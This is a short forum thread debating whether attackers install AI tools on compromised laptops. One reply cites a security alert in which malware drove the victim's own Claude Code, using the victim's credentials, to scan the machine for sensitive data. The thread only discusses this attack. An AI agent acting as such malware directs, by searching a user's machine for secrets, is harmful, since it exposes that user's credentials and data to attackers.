What commonly gets installed in those cases is actual malware, a RAT (Remote Admin Tool) that lets the attacker later run commands on your laptop (kinda like an OpenSSH server, but also punching a hole through nat and with a server that they can broadcast commands broadly to the entire fleet).
If the attacker wants to use AI to assist in looking for valuables on your machine, they won't install AI on your machine, they'll use the remote shell software to pop a shell session, and ask AI they're running on one of their machines to look around in the shell for anything sensitive.
If an attacker has access to your unlocked computer, it is already game over, and LLM tools is quite far down the list of dangerous software they could install.
Maybe we should ban common RAT software first, like `ssh` and `TeamViewer`.
> They won’t install AI on your machine
Actually they’ll just the AI you already have on your machine[0]
In this attack, the malware would use Claude Code (with your credentials) to scan your own machine.
Much easier than running the inference themselves!
[0]https://semgrep.dev/blog/2025/security-alert-nx-compromised-...
[flagged]
You know, I should have realized this was a troll account with the previous comment.
I guess that's on me for being oblivious enough that it took this obvious of a comment for me to be sure you're intentionally trolling. Nice work.